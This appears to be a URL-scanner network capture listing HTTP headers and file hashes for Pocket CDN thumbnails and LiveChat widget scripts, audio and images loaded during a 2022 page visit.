x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: tCG6Llkb9UHrJDHyxk5RgLkQ3Cds3dXRc0uMhy_9GbnzgMWk5UBS6w==
via: 1.1 86b676273517904f44af31586adb06ae.cloudfront.net (CloudFront), 1.1 98aedae6661e3904540676966998ed88.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 22:04:29 GMT
age: 74316
etag: "18800e21d05596f7b64213072dee7dda5c1faf61"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   10950
Md5:    4abf25d4a15ce58edadd54994b3434a2
Sha1:   18800e21d05596f7b64213072dee7dda5c1faf61
Sha256: 633138e70f43e2be9cc447967044c4070bfc4d9285e5228361bebe255dc286e2
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F981a8e9a-f018-45b6-af7e-199dc4c02c27.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8917
x-amzn-requestid: 10f3b269-9437-476d-ae4f-a0ac3fb78491
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cIB8wEIwoAMF8uA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637fe384-4cfeecf4553b26381ed11875;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 21:35:00 GMT
x-amz-cf-pop: SEA19-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: lr9z8FWWpMGtxtvcYzeT-ewuydSzpma8I06pszLDQIICotFkB_SZlA==
via: 1.1 2241406ac19fffc8f35d6ddef8e22f56.cloudfront.net (CloudFront), 1.1 f9d716a351f14a0ac1fac2449734849a.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 21:55:30 GMT
age: 41776
etag: "2eba66ff6539388c48562503e8d11ff0e060350a"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8917
Md5:    5863138af1ddbba34a7856242a7b3a06
Sha1:   2eba66ff6539388c48562503e8d11ff0e060350a
Sha256: d1543e1b803a07095148b743925eebbbf21f566a2df9b785a1a9d48c5604496c
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0a474c96-6cd7-4e42-a54a-02217768182e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8089
x-amzn-requestid: f4b5f150-a5dc-40bf-93b9-394c294a51cb
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cEmkRFSnIAMF5vg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637e8481-74454bee1a1ec6d506f3d75b;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 20:37:21 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: ZVv8iTGCYV-IiBJ6KwNSG1ZWSEwClaQopUejSqZq0S1wd782lRoyKA==
via: 1.1 49b94a8674d6e86a841d6523f7dbaf14.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 22:07:32 GMT
age: 41054
etag: "318c5d7acd0d36c816b09fcf1b7dc4bfb5ec7e73"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8089
Md5:    c8f6118fc03f31862ff68fef8a2b9a7f
Sha1:   318c5d7acd0d36c816b09fcf1b7dc4bfb5ec7e73
Sha256: cdd4d44f05cc524d7f2b1d6d792ecd8a9a933e52ecb7685a7d7ea786a510ef39
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F31c66612-f3a0-4e62-8b93-c9f774ffc236.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6130
x-amzn-requestid: 0ab34b27-2c6b-4a37-87ad-6fa56a265453
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cIB8wF7KIAMFjlw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637fe384-4a3d24f93ceb37d37a5ce1ee;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 21:35:00 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: SHmcFNiZ97RU02VeLiHLjFynYiSuaQP8T_XKG2UaAigWXG5sYhdVLQ==
via: 1.1 1cc6ed0d2d3dd9529ce544f9dfe61a52.cloudfront.net (CloudFront), 1.1 e4d3d5aafc7d7d582423c073065ab562.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 21:55:28 GMT
age: 41778
etag: "0214fc0deecb1115766802f42cfd256e3c479490"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6130
Md5:    ba7b9c131ab7e5998f25b069ba3860a0
Sha1:   0214fc0deecb1115766802f42cfd256e3c479490
Sha256: 717aa23c687ccebc1b5ebbfd88d0e4fe181fef038d308231842b2b1969f3976b
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F96a33fb5-b971-4386-a670-7dcbbf52b051.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 2351
x-amzn-requestid: 1e3e6b14-8f46-4b62-a3d1-f5dbe5d5f94f
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cGupUE_VIAMFa3A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637f5e3b-573fabc44ce59c2f4c24a32d;Sampled=0
x-amzn-remapped-date: Thu, 24 Nov 2022 12:06:19 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: XEUrOPYr2rn89eMIJORVFnpqJfxqfjBadcbplZKzqLjDkzHV8NEbHg==
via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 325ed3ba58a560748d886354beef39c0.cloudfront.net (CloudFront), 1.1 google
date: Thu, 24 Nov 2022 18:51:30 GMT
age: 52816
etag: "41ef94d198bbf98185eb332a3b6934c3c26c3afc"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   2351
Md5:    66d06d3cac1784e4ce6c8c89c300f10a
Sha1:   41ef94d198bbf98185eb332a3b6934c3c26c3afc
Sha256: 55312d1b43447e4f77d8e9e52451bb63a9868ba8122c9e16e0a20479d34367e3
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F44e0daff-bc52-4621-aa2f-d9c59da29c1c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 3955
x-amzn-requestid: 42c8d309-a8d2-47cc-8d97-c7fa3a63f8cd
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: cCM9NGJHoAMF4sQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-637d8eba-2a06cda9346bd02c46955444;Sampled=0
x-amzn-remapped-date: Wed, 23 Nov 2022 03:08:42 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: 5MlzpHpq7auKLSAYikINuPAylXI11VJL3xxIJ9Dyub-7rjQaPfg0WQ==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 7e87179efaa9e3c316bd3d3a74cfded8.cloudfront.net (CloudFront), 1.1 google
date: Fri, 25 Nov 2022 04:23:00 GMT
age: 18526
etag: "74cb2ccd6ae38b171bfbe5a74f0eccb09aa3836b"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   3955
Md5:    4006a9037ab5f28dca62b0aa7a704c41
Sha1:   74cb2ccd6ae38b171bfbe5a74f0eccb09aa3836b
Sha256: 556ae6516a1f272a96569a3637858292731a34e82672b682f6e7442ca68f4b1d
                                        
                                            GET /widget/static/media/new_message.34190d36.ogg HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: audio/webm,audio/ogg,audio/wav,audio/*;q=0.9,application/ogg;q=0.7,video/*;q=0.6,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Range: bytes=0-
Connection: keep-alive
Referer: http://198.50.143.158/
Sec-Fetch-Dest: audio
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 206 Partial Content
content-type: application/octet-stream
                                        
last-modified: Tue, 07 Jun 2022 10:31:15 GMT
x-amz-version-id: 0eCQ7JzXZ_yjxrlSX_vlQead.GgqRhbb
accept-ranges: bytes
server: AmazonS3
etag: "a37211a6cfcda45352d5abcff1e446bb"
x-amz-cf-pop: ARN1-C1
x-amz-cf-id: Jl-kA9f70ZstJ4iycPT9C0iokBLbhTz1Y4Rh3_BJ2ixGlD1N4r6mMA==
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:46 GMT
date: Fri, 25 Nov 2022 09:31:46 GMT
content-range: bytes 0-11403/11404
content-length: 11404
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Ogg data, Vorbis audio, stereo, 44100 Hz, ~112000 bps\012- data
Size:   11404
Md5:    a37211a6cfcda45352d5abcff1e446bb
Sha1:   5f46f941ea3247a17e35be65dcd38583c7ecbfb6
Sha256: 1d0bdbe8013ddd58bf31229ea12bd42dfe6bf4cb022cc65d519a45a13c403b5d
                                        
                                            GET /widget/static/js/3.3899cbb1.chunk.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
last-modified: Thu, 10 Nov 2022 13:27:43 GMT
x-amz-version-id: dc3XgpfGmAnP30UT.JsdxdZB0bvAGOli
server: AmazonS3
content-encoding: br
etag: W/"760c3377dc3cc4cc5033ee4913ccf860"
vary: Accept-Encoding
x-amz-cf-pop: ARN1-C1
x-amz-cf-id: UVBKEg9ucKo_4568H8OnRw9pxXeaS80w0IBOlvbJA4V7CIsZPLw86A==
content-length: 9986
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:47 GMT
date: Fri, 25 Nov 2022 09:31:47 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32629), with no line terminators
Size:   9986
Md5:    a825d39685ad0545d73ddd7db0c25bfa
Sha1:   0992a74ddb5c39d110bd623796a1d50cdbcd26bb
Sha256: 2d88711e0111a60eb740cd4b869b5577fbc6037cc3638fd6240abb885928de2c
                                        
                                            GET /widget/static/js/6.b2149920.chunk.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
last-modified: Thu, 10 Nov 2022 13:27:44 GMT
x-amz-version-id: Znk4NSMebAZa.5PuaSSFHsYgsW.8Xsqt
server: AmazonS3
content-encoding: br
etag: W/"68ceb46c58c5c5c01549d2cc90cd91e6"
vary: Accept-Encoding
x-amz-cf-pop: ARN1-C1
x-amz-cf-id: lLXbe1eaikoxQh2sXSDTirwGdC1PRgSfndKiHx7F7pljbtkExkeSDg==
content-length: 6896
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:47 GMT
date: Fri, 25 Nov 2022 09:31:47 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (20417), with no line terminators
Size:   6896
Md5:    fca982803cc20f44c7654bdd64fb9ff5
Sha1:   7ad237f8c15cf07a3bdf29f83a2b1bc85a99b604
Sha256: 73cf2b9328c906293b0f1f7bda1f99d2d44dbdd03fc43c34e2207bea7bdd8e7d
                                        
                                            GET /widget/static/js/2.3443fc0c.chunk.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
last-modified: Thu, 17 Nov 2022 13:08:44 GMT
x-amz-version-id: BSbQN2vaDFZe0B_SczuPXt28jvuj6vjB
server: AmazonS3
content-encoding: br
etag: W/"982d4c1a3512f8c05b299316e7e25828"
vary: Accept-Encoding
x-amz-cf-pop: AMS1-C1
x-amz-cf-id: ljYN-0fawYd3bhKbfQKGNHogp4XUQcwIPOZRkiRv9NrFm-6ZJp3oew==
content-length: 11363
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:47 GMT
date: Fri, 25 Nov 2022 09:31:47 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (36594), with no line terminators
Size:   11363
Md5:    84952b544bf657ced0a1aca082063556
Sha1:   06feee42f9ac0a617daa284369f6b1c5ec9cb5e9
Sha256: fcfb08ec31db0dcacb04e3e3012a80ec179ead50d6be747687403686e5e818f4
                                        
                                            GET /widget/static/js/main-view.621b0625.chunk.js HTTP/1.1 
Host: cdn.livechatinc.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
                                        
last-modified: Thu, 17 Nov 2022 13:08:44 GMT
x-amz-version-id: AucmuATmeB2cxzBVZh04jAZjQEGUPrIb
server: AmazonS3
content-encoding: br
etag: W/"4a9293826f53c52c1c7b1495d94664e0"
vary: Accept-Encoding
x-amz-cf-pop: AMS1-C1
x-amz-cf-id: 5NDntIh-sUajwFxWsS7eoQJc6fjgIhi7WQAbQpfTjSmENjW-Fc2rpg==
content-length: 37274
cache-control: max-age=31536000
expires: Sat, 25 Nov 2023 09:31:47 GMT
date: Fri, 25 Nov 2022 09:31:47 GMT
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65536), with no line terminators
Size:   37274
Md5:    e5508e1ff3b54f3a60707b0e566f1cf7
Sha1:   e5406d01ebc4f4281f239f22fd997054af163e37
Sha256: b12f6fddc656a042f7da47fd2021cff80b8448b5b2d53d6cb7c8844c56d2b3fc
                                        
                                            GET /api/file/lc/main/1797432/0/logo/95138be744c743c91e62a4292881dd8e.jpg HTTP/1.1 
Host: cdn.livechat-files.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: image/jpeg
                                        
content-length: 3289
cache-control: private, max-age=86398
date: Fri, 25 Nov 2022 09:31:47 GMT
set-cookie: FASID=FA1-DAL10|Y4CLh; path=/; Secure; SameSite=None
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90", baseline, precision 8, 70x55, components 3\012- data
Size:   3289
Md5:    1b0f364e9ac6810a5cd59b5e9bb9e89a
Sha1:   c4d769638740c0564ac39a439dabb1540d5b14f6
Sha256: a06a39e82b154b300a128c5dc6a2a2b5ac5d5624085b46694d2997fe1a6b4a30
                                        
                                            GET /api/file/lc/img/1797432/0c6c52a1e3fe3da210aa8b6b081c607c.jpg HTTP/1.1 
Host: cdn.livechat-files.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://secure.livechatinc.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         23.36.79.16
HTTP/2 200 OK
content-type: image/jpeg
                                        
content-length: 14506
cache-control: private, max-age=86400
date: Fri, 25 Nov 2022 09:31:47 GMT
set-cookie: FASID=FA2-DAL10|Y4CLh; path=/; Secure; SameSite=None
access-control-allow-origin: *
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 120x120, components 3\012- data
Size:   14506
Md5:    0e61cb74013e0ca8302ecb6f707e09ce
Sha1:   e023ca2dd226b4293d739c042d20ffd48b59f8d9
Sha256: e21aea7fba280f6220b83d50a41b0b8b747e38cfa1864c5d2d15a350e97ccaad